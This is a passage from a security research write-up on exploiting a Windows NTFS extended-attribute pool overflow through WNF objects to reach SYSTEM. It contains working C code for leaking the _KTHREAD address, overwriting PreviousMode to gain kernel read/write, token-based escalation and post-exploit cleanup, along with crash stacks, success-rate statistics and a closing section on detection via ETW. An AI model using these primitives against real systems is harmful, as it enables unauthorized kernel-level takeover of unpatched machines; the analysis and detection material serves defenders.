ffffd009`6cdc62b0 fffff805`5a9fc8a6 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002300 ffffd186`06a54000 : Ntfs!NtfsCommonQueryEa+0x22a
ffffd009`6cdc6410 fffff805`5a9fc600 : ffffd009`6cdc6560 ffffd186`08002050 ffffd186`08002050 ffffd009`6cdc7000 : Ntfs!NtfsFsdDispatchSwitch+0x286
ffffd009`6cdc6540 fffff805`570d1f35 : ffffd009`6cdc68b0 fffff805`54704b46 ffffd009`6cdc7000 ffffd009`6cdc1000 : Ntfs!NtfsFsdDispatchWait+0x40
ffffd009`6cdc67e0 fffff805`54706ccf : ffffd186`02802940 ffffd186`00000030 00000000`00000000 00000000`00000000 : nt!IofCallDriver+0x55
ffffd009`6cdc6820 fffff805`547048d3 : ffffd009`6cdc68b0 00000000`00000000 00000000`00000001 ffffd186`03074bc0 : FLTMGR!FltpLegacyProcessingAfterPreCallbacksCompleted+0x28f
ffffd009`6cdc6890 fffff805`570d1f35 : ffffd186`08002050 00000000`000000c0 00000000`000000c8 00000000`000000a4 : FLTMGR!FltpDispatch+0xa3
ffffd009`6cdc68f0 fffff805`574a6fb8 : ffffd186`08002050 00000000`00000000 00000000`00000000 fffff805`577b2094 : nt!IofCallDriver+0x55
ffffd009`6cdc6930 fffff805`57455834 : 000000ce`00000000 ffffd009`6cdc6b80 ffffd186`084eb7b0 ffffd009`6cdc6b80 : nt!IopSynchronousServiceTail+0x1a8
ffffd009`6cdc69d0 fffff805`572058b5 : ffffd186`06a54080 000000ce`178fdae8 000000ce`178feba0 00000000`000000a3 : nt!NtQueryEaFile+0x484
ffffd009`6cdc6a90 00007fff`0bfae654 : 00007ff6`da2c14dd 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd009`6cdc6b00)
000000ce`178fdac8 00007ff6`da2c14dd : 00007ff6`da2c4490 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba : ntdll!NtQueryEaFile+0x14
000000ce`178fdad0 00007ff6`da2c4490 : 00000000`000000a3 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 : 0x00007ff6`da2c14dd
000000ce`178fdad8 00000000`000000a3 : 000000ce`178fbee8 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 : 0x00007ff6`da2c4490
000000ce`178fdae0 000000ce`178fbee8 : 0000026e`edf509ba 00000000`00000000 000000ce`178fdba0 000000ce`00000017 : 0xa3
000000ce`178fdae8 0000026e`edf509ba : 00000000`00000000 000000ce`178fdba0 000000ce`00000017 00000000`00000000 : 0x000000ce`178fbee8
000000ce`178fdaf0 00000000`00000000 : 000000ce`178fdba0 000000ce`00000017 00000000`00000000 0000026e`00000001 : 0x0000026e`edf509ba

So we now know how to calculate the address of the _KTHREAD kernel data structure which is associated with our running exploit thread.


At the end of stage 2 we have the following memory layout:

Stage 3 – Abusing PreviousMode

Once we have set the StateData pointer of the _WNF_NAME_INSTANCE to just before the _KPROCESS ThreadListHead Flink, we can leak out the Flink value by confusing it with the DataSize and the ChangeStamp: after querying the object we can calculate it as FLINK = ((uintptr_t)ChangeStamp << 32) | DataSize.

This allows us to calculate the _KTHREAD address using FLINK - 0x2f8.
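
A minimal sketch of that arithmetic (the 0x2F8 ThreadListEntry offset and the 0x232 PreviousMode offset used below are for the build tested in this post and will vary between Windows versions):

// Rebuild the leaked Flink from the two confused 32-bit fields and derive the
// _KTHREAD (and PreviousMode) addresses from it.
unsigned long long KThreadFromLeak(unsigned int changeStamp, unsigned int dataSize)
{
    unsigned long long flink = ((unsigned long long)changeStamp << 32) | dataSize;

    unsigned long long kthread = flink - 0x2F8;           // Flink points at KTHREAD.ThreadListEntry

    unsigned long long previousMode = kthread + 0x232;    // used in stage 3 below
    (void)previousMode;

    return kthread;
}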

Once we have the address of the _KTHREAD we need to again find a sane value to confuse with the AllocatedSize and DataSize, to allow reading and writing of the PreviousMode value at offset 0x232.

In this case, pointing it into here:

   +0x220 Process          : 0xffff900f`56ef0340 _KPROCESS
   +0x228 UserAffinity     : _GROUP_AFFINITY
   +0x228 UserAffinityFill : [10]  "???"

Gives the following "sane" values:

dt _WNF_STATE_DATA FLINK-0x2f8+0x220

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : 0xffff900f
   +0x008 DataSize         : 3
   +0x00c ChangeStamp      : 0

This allows the most significant word of the Process pointer shown above to be used as the AllocatedSize and the UserAffinity to act as the DataSize. Incidentally, we can actually influence this value used for DataSize using SetProcessAffinityMask or by launching the process with start /affinity exploit.exe, but for our purposes of being able to read and write PreviousMode this is fine.

Visually this looks as follows after the StateData has been modified:

This gives a 3-byte read (and up to a 0xffff900f-byte write if needed – but we only need 3 bytes), within which the PreviousMode is included (i.e. set to 1 before modification):

00 00 01 00 00 00 00 00  00 00 | ..........

Using the most significant word of the pointer, which will always be a kernel-mode address, should ensure that this is a sufficient AllocatedSize to enable overwriting PreviousMode.
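
To make the step concrete, here is a minimal sketch of flipping PreviousMode through the redirected StateData. WnfRead and WnfWrite are hypothetical wrappers around NtQueryWnfStateData and NtUpdateWnfStateData for the corrupted state name (not helpers from the original exploit); with StateData at _KTHREAD+0x220 the data region starts at +0x230, so PreviousMode (+0x232) is byte index 2.

// Hypothetical relative read/write wrappers over the corrupted WNF object.
extern int WnfRead(unsigned long long stateName, void* buffer, unsigned long length);
extern int WnfWrite(unsigned long long stateName, const void* buffer, unsigned long length);
extern unsigned long long g_CorruptStateName;

void SetPreviousModeToKernel(void)
{
    unsigned char data[3];

    // Expect 00 00 01 – the two bytes before PreviousMode plus PreviousMode itself.
    WnfRead(g_CorruptStateName, data, sizeof(data));

    data[2] = 0;   // PreviousMode = KernelMode

    // Write the 3 bytes back through the redirected StateData pointer.
    WnfWrite(g_CorruptStateName, data, sizeof(data));
}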

Post Exploitation

Once we have set PreviousMode to 0, as mentioned above, this gives an unconstrained read/write across the whole kernel memory space using NtWriteVirtualMemory and NtReadVirtualMemory. This is a very powerful method and demonstrates the value of moving from an awkward-to-use arbitrary read/write to a primitive which enables easier post exploitation and enhanced clean-up options.
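
As a sketch of how the read64/write64 helpers used in the code later in this post could be built on top of these calls (the Nt* prototypes are hand-declared here since they are not in the SDK headers; this is one possible shape, not the exploit's exact implementation):

#include <windows.h>
#include <winternl.h>

// Hand-declared prototypes for the ntdll exports (assumption: link against
// ntdll.lib or resolve them with GetProcAddress).
NTSTATUS NTAPI NtReadVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress,
                                   PVOID Buffer, SIZE_T NumberOfBytesToRead,
                                   PSIZE_T NumberOfBytesRead);
NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress,
                                    PVOID Buffer, SIZE_T NumberOfBytesToWrite,
                                    PSIZE_T NumberOfBytesWritten);

// With PreviousMode set to KernelMode the user-mode address checks in
// MiReadWriteVirtualMemory are skipped, so kernel addresses can be passed as
// BaseAddress against the current process handle.
LPVOID read64(LPVOID address)
{
    LPVOID value = NULL;
    SIZE_T returned = 0;
    NtReadVirtualMemory(GetCurrentProcess(), address, &value, sizeof(value), &returned);
    return value;
}

void write64(LPVOID address, ULONGLONG value)
{
    SIZE_T returned = 0;
    NtWriteVirtualMemory(GetCurrentProcess(), address, &value, sizeof(value), &returned);
}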

It is then trivial to walk the ActiveProcessLinks within the EPROCESS, obtain a pointer to a SYSTEM token and replace the existing token with this or to perform escalation by overwriting the _SEP_TOKEN_PRIVILEGES for the existing token using techniques which have been long used by Windows exploits.

Kernel Memory Cleanup

OK, so the above is good enough for a proof-of-concept exploit, but due to the potentially large number of memory writes needed for exploit success, it could leave the kernel in a bad state. Also, when the process terminates, certain memory locations which have been overwritten could trigger a BSOD when that corrupted memory is used.

This part of the exploitation process is often overlooked by proof-of-concept exploit writers but is often the most challenging for use in real-world scenarios (red teams / simulated attacks etc.) where stability and reliability are important. Going through this process also helps with understanding how these types of attacks can be detected.

This section of the blog describes some improvements which can be made in this area.

PreviousMode Restoration

On the version of Windows tested, if we try to launch a new process as SYSTEM whilst PreviousMode is still set to 0, then we end up with the following crash:

```
Access violation - code c0000005 (!!! second chance !!!)
nt!PspLocateInPEManifest+0xa9:
fffff804`502f1bb5 0fba68080d      bts     dword ptr [rax+8],0Dh
0: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffff8583`c6259c90 fffff804`502f0689 : 00000195`b24ec500 00000000`00000000 00000000`00000428 00007ff6`00000000 : nt!PspLocateInPEManifest+0xa9
01 ffff8583`c6259d00 fffff804`501f19d0 : 00000000`000022aa ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspSetupUserProcessAddressSpace+0xdd
02 ffff8583`c6259db0 fffff804`5021ca6d : 00000000`00000000 ffff8583`c625a350 00000000`00000000 00000000`00000000 : nt!PspAllocateProcess+0x11a4
03 ffff8583`c625a2d0 fffff804`500058b5 : 00000000`00000002 00000000`00000001 00000000`00000000 00000195`b24ec560 : nt!NtCreateUserProcess+0x6ed
04 ffff8583`c625aa90 00007ffd`b35cd6b4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffff8583`c625ab00)
05 0000008c`c853e418 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtCreateUserProcess+0x14
```

More research needs to be performed to determine if this is necessary on prior versions or if this was a recently introduced change.

This can be fixed simply by using our NtWriteVirtualMemory API to restore the PreviousMode value to 1 before launching the cmd.exe shell.
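
A minimal sketch of that restoration (kthread and the 0x232 offset come from the earlier stages; NtWriteVirtualMemory is declared as in the earlier sketch). The call itself still succeeds against a kernel address because the validation check reads PreviousMode before the one-byte write takes effect:

void RestorePreviousMode(unsigned long long kthread)
{
    unsigned char userMode = 1;   // KPROCESSOR_MODE UserMode
    SIZE_T returned = 0;

    // Put PreviousMode back to UserMode before spawning the SYSTEM cmd.exe.
    NtWriteVirtualMemory(GetCurrentProcess(), (PVOID)(kthread + 0x232),
                         &userMode, sizeof(userMode), &returned);
}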

StateData Pointer Restoration

The _WNF_STATE_DATA StateData pointer is freed when the _WNF_NAME_INSTANCE is freed on process termination (incidentally, also an arbitrary free). If this is not restored to its original value, we will end up with a crash as follows:

00 ffffdc87`2a708cd8 fffff807`27912082 : ffffdc87`2a708e40 fffff807`2777b1d0 00000000`00000100 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffdc87`2a708ce0 fffff807`27911666 : 00000000`00000003 ffffdc87`2a708e40 fffff807`27808e90 00000000`0000013a : nt!KiBugCheckDebugBreak+0x12
02 ffffdc87`2a708d40 fffff807`277f3fa7 : 00000000`00000003 00000000`00000023 00000000`00000012 00000000`00000000 : nt!KeBugCheck2+0x946
03 ffffdc87`2a709450 fffff807`2798d938 : 00000000`0000013a 00000000`00000012 ffffa409`6ba02100 ffffa409`7120a000 : nt!KeBugCheckEx+0x107
04 ffffdc87`2a709490 fffff807`2798d998 : 00000000`00000012 ffffdc87`2a7095a0 ffffa409`6ba02100 fffff807`276df83e : nt!RtlpHeapHandleError+0x40
05 ffffdc87`2a7094d0 fffff807`2798d5c5 : ffffa409`7120a000 ffffa409`6ba02280 ffffa409`6ba02280 00000000`00000001 : nt!RtlpHpHeapHandleError+0x58
06 ffffdc87`2a709500 fffff807`2786667e : ffffa409`71293280 00000000`00000001 00000000`00000000 ffffa409`6f6de600 : nt!RtlpLogHeapFailure+0x45
07 ffffdc87`2a709530 fffff807`276cbc44 : 00000000`00000000 ffffb504`3b1aa7d0 00000000`00000000 ffffb504`00000000 : nt!RtlpHpVsContextFree+0x19954e
08 ffffdc87`2a7095d0 fffff807`27db2019 : 00000000`00052d20 ffffb504`33ea4600 ffffa409`712932a0 01000000`00100000 : nt!ExFreeHeapPool+0x4d4        
09 ffffdc87`2a7096b0 fffff807`27a5856b : ffffb504`00000000 ffffb504`00000000 ffffb504`3b1ab020 ffffb504`00000000 : nt!ExFreePool+0x9
0a ffffdc87`2a7096e0 fffff807`27a58329 : 00000000`00000000 ffffa409`712936d0 ffffa409`712936d0 ffffb504`00000000 : nt!ExpWnfDeleteStateData+0x8b
0b ffffdc87`2a709710 fffff807`27c46003 : ffffffff`ffffffff ffffb504`3b1ab020 ffffb504`3ab0f780 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1ed
0c ffffdc87`2a709760 fffff807`27b0553e : 00000000`00000000 ffffdc87`2a709990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0d ffffdc87`2a7097a0 fffff807`27a9ea7f : ffffa409`7129d080 ffffb504`336506a0 ffffdc87`2a709990 00000000`00000000 : nt!ExWnfExitProcess+0x32
0e ffffdc87`2a7097d0 fffff807`279f4558 : 00000000`c000013a 00000000`00000001 ffffdc87`2a7099e0 00000055`8b6d6000 : nt!PspExitThread+0x5eb
0f ffffdc87`2a7098d0 fffff807`276e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff807`276f0ee6 : nt!KiSchedulerApcTerminate+0x38
10 ffffdc87`2a709910 fffff807`277f8440 : 00000000`00000000 ffffdc87`2a7099c0 ffffdc87`2a709b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
11 ffffdc87`2a7099c0 fffff807`2780595f : ffffa409`71293000 00000251`173f2b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
12 ffffdc87`2a709b00 00007ff9`18cabe44 : 00007ff9`165d26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffdc87`2a709b00)
13 00000055`8b8ffb28 00007ff9`165d26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`18c5a800 : ntdll!NtWaitForSingleObject+0x14
14 00000055`8b8ffb30 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`18c5a800 00000000`00000000 : 0x00007ff9`165d26ee

Although we could restore this using the WNF relative read/write, as we have arbitrary read and write using the APIs, we can implement a function which uses a previously saved ScopeInstance pointer to search for the StateName of our targeted _WNF_NAME_INSTANCE object address.

Visually this looks as follows:

Some example code for this is:

/**
* This function returns back the address of a _WNF_NAME_INSTANCE looked up by its internal StateName
* It performs an _RTL_AVL_TREE tree walk against the sorted tree of _WNF_NAME_INSTANCES. 
* The tree root is at _WNF_SCOPE_INSTANCE+0x38 (NameSet)
**/
QWORD* FindStateName(unsigned __int64 StateName)
{
    QWORD* i;
    
    // _WNF_SCOPE_INSTANCE+0x38 (NameSet)
    for (i = (QWORD*)read64((char*)BackupScopeInstance+0x38); ; i = (QWORD*)read64((char*)i + 0x8))
    {

        while (1)
        {
            if (!i)
                return 0;

            // StateName is 0x18 after the TreeLinks FLINK
            QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

            if (StateName >= CurrStateName)
                break;

            i = (QWORD*)read64(i);
        }
        QWORD CurrStateName = (QWORD)read64((char*)i + 0x18);

        if (StateName <= CurrStateName)
            break; 
    }
    return (QWORD*)((QWORD*)i - 2);
}

Then once we have obtained our _WNF_NAME_INSTANCE we can then restore the original StateData pointer.

RunRef Restoration

The next crash encountered was related to the fact that we may have corrupted many RunRef members of _WNF_NAME_INSTANCEs in the process of obtaining our unbounded _WNF_STATE_DATA. When ExReleaseRundownProtection is called and an invalid value is present, we will crash as follows:

1: kd> kv
 # Child-SP          RetAddr           : Args to Child                                                           : Call Site
00 ffffeb0f`0e9e5bf8 fffff805`2f512082 : ffffeb0f`0e9e5d60 fffff805`2f37b1d0 00000000`00000000 00000000`00000000 : nt!DbgBreakPointWithStatus
01 ffffeb0f`0e9e5c00 fffff805`2f511666 : 00000000`00000003 ffffeb0f`0e9e5d60 fffff805`2f408e90 00000000`0000003b : nt!KiBugCheckDebugBreak+0x12
02 ffffeb0f`0e9e5c60 fffff805`2f3f3fa7 : 00000000`00000103 00000000`00000000 fffff805`2f0e3838 ffffc807`cdb5e5e8 : nt!KeBugCheck2+0x946
03 ffffeb0f`0e9e6370 fffff805`2f405e69 : 00000000`0000003b 00000000`c0000005 fffff805`2f242c32 ffffeb0f`0e9e6cb0 : nt!KeBugCheckEx+0x107
04 ffffeb0f`0e9e63b0 fffff805`2f4052bc : ffffeb0f`0e9e7478 fffff805`2f0e3838 ffffeb0f`0e9e65a0 00000000`00000000 : nt!KiBugCheckDispatch+0x69
05 ffffeb0f`0e9e64f0 fffff805`2f3fcd5f : fffff805`2f405240 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceHandler+0x7c
06 ffffeb0f`0e9e6530 fffff805`2f285027 : ffffeb0f`0e9e6aa0 00000000`00000000 ffffeb0f`0e9e7b00 fffff805`2f40595f : nt!RtlpExecuteHandlerForException+0xf
07 ffffeb0f`0e9e6560 fffff805`2f283ce6 : ffffeb0f`0e9e7478 ffffeb0f`0e9e71b0 ffffeb0f`0e9e7478 ffffa300`da5eb5d8 : nt!RtlDispatchException+0x297
08 ffffeb0f`0e9e6c80 fffff805`2f405fac : ffff521f`0e9e8ad8 ffffeb0f`0e9e7560 00000000`00000000 00000000`00000000 : nt!KiDispatchException+0x186
09 ffffeb0f`0e9e7340 fffff805`2f401ce0 : 00000000`00000000 00000000`00000000 ffffffff`ffffffff ffffa300`daf84000 : nt!KiExceptionDispatch+0x12c
0a ffffeb0f`0e9e7520 fffff805`2f242c32 : ffffc807`ce062a50 fffff805`2f2df0dd ffffc807`ce062400 ffffa300`da5eb5d8 : nt!KiGeneralProtectionFault+0x320 (TrapFrame @ ffffeb0f`0e9e7520)
0b ffffeb0f`0e9e76b0 fffff805`2f2e8664 : 00000000`00000006 ffffa300`d449d8a0 ffffa300`da5eb5d8 ffffa300`db013360 : nt!ExfReleaseRundownProtection+0x32
0c ffffeb0f`0e9e76e0 fffff805`2f658318 : ffffffff`00000000 ffffa300`00000000 ffffc807`ce062a50 ffffa300`00000000 : nt!ExReleaseRundownProtection+0x24
0d ffffeb0f`0e9e7710 fffff805`2f846003 : ffffffff`ffffffff ffffa300`db013360 ffffa300`da5eb5a0 00000000`00000000 : nt!ExpWnfDeleteNameInstance+0x1dc
0e ffffeb0f`0e9e7760 fffff805`2f70553e : 00000000`00000000 ffffeb0f`0e9e7990 00000000`00000000 00000000`00000000 : nt!ExpWnfDeleteProcessContext+0x140a9b
0f ffffeb0f`0e9e77a0 fffff805`2f69ea7f : ffffc807`ce0700c0 ffffa300`d2c506a0 ffffeb0f`0e9e7990 00000000`00000000 : nt!ExWnfExitProcess+0x32
10 ffffeb0f`0e9e77d0 fffff805`2f5f4558 : 00000000`c000013a 00000000`00000001 ffffeb0f`0e9e79e0 000000f1`f98db000 : nt!PspExitThread+0x5eb
11 ffffeb0f`0e9e78d0 fffff805`2f2e6ca7 : 00000000`00000000 00000000`00000000 00000000`00000000 fffff805`2f2f0ee6 : nt!KiSchedulerApcTerminate+0x38
12 ffffeb0f`0e9e7910 fffff805`2f3f8440 : 00000000`00000000 ffffeb0f`0e9e79c0 ffffeb0f`0e9e7b80 ffffffff`00000000 : nt!KiDeliverApc+0x487
13 ffffeb0f`0e9e79c0 fffff805`2f40595f : ffffc807`ce062400 0000020b`04f64b90 00000000`00000000 00000000`00000000 : nt!KiInitiateUserApc+0x70
14 ffffeb0f`0e9e7b00 00007ff9`8314be44 : 00007ff9`80aa26ee 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceExit+0x9f (TrapFrame @ ffffeb0f`0e9e7b00)
15 000000f1`f973f678 00007ff9`80aa26ee : 00000000`00000000 00000000`00000000 00000000`00000000 00007ff9`830fa800 : ntdll!NtWaitForSingleObject+0x14
16 000000f1`f973f680 00000000`00000000 : 00000000`00000000 00000000`00000000 00007ff9`830fa800 00000000`00000000 : 0x00007ff9`80aa26ee

To restore these correctly we need to think about how these objects fit together in memory and how to obtain a full list of all _WNF_NAME_INSTANCES which could possibly be corrupt.

Within _EPROCESS we have a member WnfContext which is a pointer to a _WNF_PROCESS_CONTEXT.

This looks as follows:

nt!_WNF_PROCESS_CONTEXT
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 Process          : Ptr64 _EPROCESS
   +0x010 WnfProcessesListEntry : _LIST_ENTRY
   +0x020 ImplicitScopeInstances : [3] Ptr64 Void
   +0x038 TemporaryNamesListLock : _WNF_LOCK
   +0x040 TemporaryNamesListHead : _LIST_ENTRY
   +0x050 ProcessSubscriptionListLock : _WNF_LOCK
   +0x058 ProcessSubscriptionListHead : _LIST_ENTRY
   +0x068 DeliveryPendingListLock : _WNF_LOCK
   +0x070 DeliveryPendingListHead : _LIST_ENTRY
   +0x080 NotificationEvent : Ptr64 _KEVENT

As you can see, there is a member TemporaryNamesListHead which is a linked list of the TemporaryNameListEntry members within each _WNF_NAME_INSTANCE.

Therefore, we can calculate the address of each of the _WNF_NAME_INSTANCES by iterating through the linked list using our arbitrary read primitives.

We can then determine if the Header or RunRef has been corrupted and restore to a sane value which does not cause a BSOD (i.e. 0).

An example of this is:

/**
* This function starts from the EPROCESS WnfContext which points at a _WNF_PROCESS_CONTEXT
* The _WNF_PROCESS_CONTEXT contains a TemporaryNamesListHead at 0x40 offset. 
* This linked list is then traversed to locate all _WNF_NAME_INSTANCES and the header and RunRef fixed up.
**/
void FindCorruptedRunRefs(LPVOID wnf_process_context_ptr)
{

    // +0x040 TemporaryNamesListHead : _LIST_ENTRY
    LPVOID first = read64((char*)wnf_process_context_ptr + 0x40);
    LPVOID ptr; 

    for (ptr = read64(read64((char*)wnf_process_context_ptr + 0x40)); ; ptr = read64(ptr))
    {
        if (ptr == first) return;

        // +0x088 TemporaryNameListEntry : _LIST_ENTRY
        QWORD* nameinstance = (QWORD*)ptr - 17;

        QWORD header = (QWORD)read64(nameinstance);
        
        if (header != 0x0000000000A80903)
        {
            // Fix the header up.
            write64(nameinstance, 0x0000000000A80903);
            // Fix the RunRef up.
            write64((char*)nameinstance + 0x8, 0);
        }
    }
}

NTOSKRNL Base Address

Whilst this isn’t actually needed by the exploit, I had the need to obtain the NTOSKRNL base address to speed up some examinations and debugging of the segment heap. With access to the EPROCESS/KPROCESS or ETHREAD/KTHREAD, the NTOSKRNL base address can be obtained from the kernel stack. By putting a newly created thread into the wait state, we can then walk the kernel stack for that thread and obtain the return address of a known function. Using this and a fixed offset we can calculate the NTOSKRNL base address. A similar technique was used within KernelForge.

The following output shows the thread whilst in the wait state:

0: kd> !thread ffffbc037834b080
THREAD ffffbc037834b080  Cid 1ed8.1f54  Teb: 000000537ff92000 Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
    ffffbc037d7f7a60  SynchronizationEvent
Not impersonating
DeviceMap                 ffff988cca61adf0
Owning Process            ffffbc037d8a4340       Image:         amberzebra.exe
Attached Process          N/A            Image:         N/A
Wait Start TickCount      3234           Ticks: 542 (0:00:00:08.468)
Context Switch Count      4              IdealProcessor: 1             
UserTime                  00:00:00.000
KernelTime                00:00:00.000
Win32 Start Address 0x00007ff6e77b1710
Stack Init ffffd288fe699c90 Current ffffd288fe6996a0
Base ffffd288fe69a000 Limit ffffd288fe694000 Call 0000000000000000
Priority 8 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP          RetAddr           : Args to Child                                                           : Call Site
ffffd288`fe6996e0 fffff804`818e4540 : fffff804`7d17d180 00000000`ffffffff ffffd288`fe699860 ffffd288`fe699a20 : nt!KiSwapContext+0x76
ffffd288`fe699820 fffff804`818e3a6f : 00000000`00000000 00000000`00000001 ffffd288`fe6999e0 00000000`00000000 : nt!KiSwapThread+0x500
ffffd288`fe6998d0 fffff804`818e3313 : 00000000`00000000 fffff804`00000000 ffffbc03`7c41d500 ffffbc03`7834b1c0 : nt!KiCommitThreadWait+0x14f
ffffd288`fe699970 fffff804`81cd6261 : ffffbc03`7d7f7a60 00000000`00000006 00000000`00000001 00000000`00000000 : nt!KeWaitForSingleObject+0x233
ffffd288`fe699a60 fffff804`81cd630a : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!ObWaitForSingleObject+0x91
ffffd288`fe699ac0 fffff804`81a058b5 : ffffbc03`7834b080 00000000`00000000 00000000`00000000 00000000`00000000 : nt!NtWaitForSingleObject+0x6a
ffffd288`fe699b00 00007ffc`c0babe44 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x25 (TrapFrame @ ffffd288`fe699b00)
00000053`003ffc68 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!NtWaitForSingleObject+0x14
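
As a simplified sketch of just the final step (a slight variation on the fixed-offset approach described above): given any return address into ntoskrnl pulled off the waiting thread's kernel stack with the arbitrary read, the image base can be found by scanning backwards a page at a time for the 'MZ' DOS header. read64 is the primitive from earlier.

// Walk backwards page by page from a pointer into ntoskrnl until the
// IMAGE_DOS_HEADER ('MZ', 0x5A4D) at the image base is found.
unsigned long long FindNtoskrnlBase(unsigned long long pointerIntoNt)
{
    unsigned long long page = pointerIntoNt & ~0xFFFULL;

    for (;;)
    {
        unsigned long long first = (unsigned long long)read64((LPVOID)page);

        if ((first & 0xFFFF) == 0x5A4D)   // 'MZ'
            return page;

        page -= 0x1000;
    }
}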

Exploit Testing and Statistics

As there are some elements of instability and non-determinism in this exploit, an exploit testing framework was developed to determine its effectiveness across multiple runs, on multiple different supported platforms, and with varying exploit parameters. Whilst this lab environment is not fully representative of a long-running operating system with potentially other third-party drivers etc. installed and a noisier kernel pool, it gives some indication that this approach is feasible and also feeds into possible detection mechanisms.

The key variables which can be modified with this exploit are:

  • Spray size
  • Post-exploitation choices

All these are measured over 100 iterations of the exploit (over 5 runs) for a timeout duration of 15 seconds (i.e. a BSOD did not occur within 15 seconds of an execution of the exploit).

SYSTEM shells – Number of times a SYSTEM shell was launched.

Total LFH Writes – For all 100 runs of the exploit, how many corruptions were triggered.

Avg LFH Writes – Average number of LFH overflows needed to obtain a SYSTEM shell.

Failed after 32 – How many times the exploit failed to overflow an adjacent object of the required target type, by reaching the maximum number of overflow attempts. 32 was chosen as a semi-arbitrary value based on empirical testing and the blocks in the BlockBitmap for the LFH being scanned in groups of 32 blocks.

BSODs on exec – Number of times the exploit BSOD’d the box on execution.

Unmapped Read – Number of times the relative read reaches unmapped memory (ExpWnfReadStateData) – included in the BSOD on exec count above.

Spray Size Variation

The following statistics show runs when varying the spray size.

Spray size 3000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 85 82 76 75 75 78
Total LFH writes 708 726 707 678 624 688
Avg LFH writes 8 8 9 9 8 8
Failed after 32 1 3 2 1 1 2
BSODs on exec 14 15 22 24 24 20
Unmapped Read 4 5 8 6 10 7

Spray size 6000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 80 78 84 79 81
Total LFH writes 674 643 696 762 706 696
Avg LFH writes 8 8 9 9 8 8
Failed after 32 2 4 3 3 4 3
BSODs on exec 14 16 19 13 17 16
Unmapped Read 2 4 4 5 4 4

Spray size 10000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 84 85 87 85 86 85
Total LFH writes 805 714 761 688 694 732
Avg LFH writes 9 8 8 8 8 8
Failed after 32 3 5 3 3 3 3
BSODs on exec 13 10 10 12 11 11
Unmapped Read 1 0 1 1 0 1

Spray size 20000

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
SYSTEM shells 89 90 94 90 90 91
Total LFH writes 624 763 657 762 650 691
Avg LFH writes 7 8 7 8 7 7
Failed after 32 3 2 1 2 2 2
BSODs on exec 8 8 5 8 8 7
Unmapped Read 0 0 0 0 1 0

From this we can see that increasing the spray size leads to a much decreased chance of hitting an unmapped read (due to the page not being mapped) and thus reduces the number of BSODs.

On average, the number of overflows needed to obtain the correct memory layout stayed roughly the same regardless of spray size.

Post Exploitation Method Variation

I also experimented with the post exploitation method used (token stealing vs modifying the existing token). The reason for this is that the token-stealing method involves more kernel reads/writes and a longer duration before PreviousMode is reverted.

20000 spray size

With all the _SEP_TOKEN_PRIVILEGES enabled:

Result Run 1 Run 2 Run 3 Run 4 Run 5 Avg
PRIV shells 94 92 93 92 89 92
Total LFH writes 939 825 825 788 724 820
Avg LFH writes 9 8 8 8 8 8
Failed after 32 2 2 1 2 0 1
BSODs on exec 4 6 6 6 11 6
Unmapped Read 0 1 1 2 2 1

Therefore, there is only a negligible difference between these two methods.

Detection

After all of this is there anything we have learned which could help defenders?

Well, firstly, a patch has been available for this vulnerability since the 8th of June 2021. If you’re reading this and the patch is not applied, then there are obviously bigger problems with the patch management lifecycle to focus on 🙂

However, there are some engineering insights which can be gained from this and from detecting memory corruption exploits in the wild in general. I will focus specifically on the vulnerability itself and this exploit, rather than the more generic post exploitation technique detection (token stealing etc.) which has been covered in many online articles. As I never had access to the in-the-wild exploit, these detection mechanisms may not be useful for that scenario. Regardless, this research should give security researchers a greater understanding of this area.

The main artifacts from this exploit are:

  • NTFS Extended Attributes being created and queried.
  • WNF objects being created (as part of the spray)
  • Failed exploit attempts leading to BSODs

NTFS Extended Attributes

Firstly, examining the ETW framework for Windows, the provider Microsoft-Windows-Kernel-File was found to expose "SetEa" and "QueryEa" events.

This can be captured as part of an ETW trace:
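
For example (the parameters are illustrative and may need adjusting – in particular I have not verified which keywords or level are required to capture the SetEa/QueryEa events), a trace for this provider can be collected with logman:

:: Start a trace session for the kernel file provider
logman start KernelFileTrace -p "Microsoft-Windows-Kernel-File" -o kernel-file.etl -ets

:: ...reproduce the activity under test, then stop the session
logman stop KernelFileTrace -ets

:: Convert the trace for inspection; SetEa and QueryEa show up as distinct events
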